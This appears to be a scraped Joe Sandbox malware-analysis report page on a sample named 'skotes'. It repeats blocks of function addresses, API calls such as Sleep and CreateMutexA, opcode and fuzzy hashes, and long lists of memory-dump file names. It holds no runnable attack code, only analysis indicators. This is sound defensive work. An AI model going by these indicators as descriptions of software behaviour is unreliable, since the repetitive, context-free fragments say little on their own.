Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 912b3c0012d2eccffa110afbcf3c19459474a736d6b851fb64cd50ca4847288a
Instruction ID: 11deb785d08b2cb63f4b7e954447b99cbec06bf016f2ef7dd8bf8fdcc01a6541
Opcode Fuzzy Hash: 912b3c0012d2eccffa110afbcf3c19459474a736d6b851fb64cd50ca4847288a
Instruction Fuzzy Hash: 02311A717003009BEB08DB78DD89B6DB772DFC6324F248A2AE014E73D1DB7D9991865A

Function 00409ADC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 7a3a5f86b3f61859689868cd81c34dc615bb0c273ce2ae21324ec6e7b97411e4
Instruction ID: 72b05407e88d2a91a21b709c496f73f4cc71e92c6ed17295eaa91bb04d3dd524
Opcode Fuzzy Hash: 7a3a5f86b3f61859689868cd81c34dc615bb0c273ce2ae21324ec6e7b97411e4
Instruction Fuzzy Hash: 67216A727042009BEB189F68DD8976DB761EBC1324F20462EE404E73D1DB7D5991865A

Function 0040A856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 3879e877403e041fa86910e069ae7c5d8ddcd22c657f84303252a7b451e6c756
Instruction ID: cf680a765b9ec26012a08514ab7f69ee3bfb861b00f68fa7cd35a045ef8527f9
Opcode Fuzzy Hash: 3879e877403e041fa86910e069ae7c5d8ddcd22c657f84303252a7b451e6c756
Instruction Fuzzy Hash: BC216A727493009AFB24BB698C9676EB6219F81314F24883BE504F63D1CF7E5991819F

Function 0040A34F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0040A963
CreateMutexA.KERNELBASE(00000000,00000000,00463254), ref: 0040A981

Strings

T2F, xrefs: 0040A970

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2F
API String ID: 1464230837-3862687658
Opcode ID: 13da57d3bb98aea8b7736e2bdbfe907c04fc729a28d4f1a45bb41898de58c43f
Instruction ID: f6c50d5d5dd9d2d29e01bc0c65139f36fa83c57186d8f48e5f9f7a273d3dc06e
Opcode Fuzzy Hash: 13da57d3bb98aea8b7736e2bdbfe907c04fc729a28d4f1a45bb41898de58c43f
Instruction Fuzzy Hash: 96217C727043009BEB18DB68DD8576DBB61DBD2325F24862FE404E77D0CB7D5990829A

Non-executed Functions

Function 00402EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00402F5F
GetCurrentThreadId.KERNEL32 ref: 00402F7E
__Mtx_unlock.LIBCPMT ref: 00402FCC
__Cnd_broadcast.LIBCPMT ref: 00402FE3
__Mtx_unlock.LIBCPMT ref: 004030F5
GetCurrentThreadId.KERNEL32 ref: 00403132
__Mtx_unlock.LIBCPMT ref: 0040319B

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727340897.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 7a31e774ce5160496b868481ad1714a18b6c01a7f89619dc1ccf0676da36917e
Instruction ID: 2ceb4b633ad4a171d295bd911596fac7f10c239a595cf67c3a826b401b9ecef4
Opcode Fuzzy Hash: 7a31e774ce5160496b868481ad1714a18b6c01a7f89619dc1ccf0676da36917e
Instruction Fuzzy Hash: 9EA10170A01205AFDB10DF65C94579BBBA8FF18315F00817BE815EB381EB39EA44CB99

Function 0043CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0043CC66

Strings

vC, xrefs: 0043CBE1

Memory Dump Source

Source File: 00000002.00000002.1725120776.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1724491178.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725120776.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725203580.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725248583.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725272248.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725523316.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725547727.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725781712.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725836564.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725881044.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725928954.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725946786.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1725982656.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726004166.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726035071.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726055406.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726072537.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726200814.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726231451.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726605042.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726622267.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726641293.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726664742.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726684868.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726704464.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726735071.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726786091.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726908663.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726951137.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726972455.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1726995494.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727015082.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727039128.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727061783.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727086829.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727107469.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727127584.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727146325.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727196829.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727215731.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727239300.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727264025.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727284217.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727299523.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1727319522.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
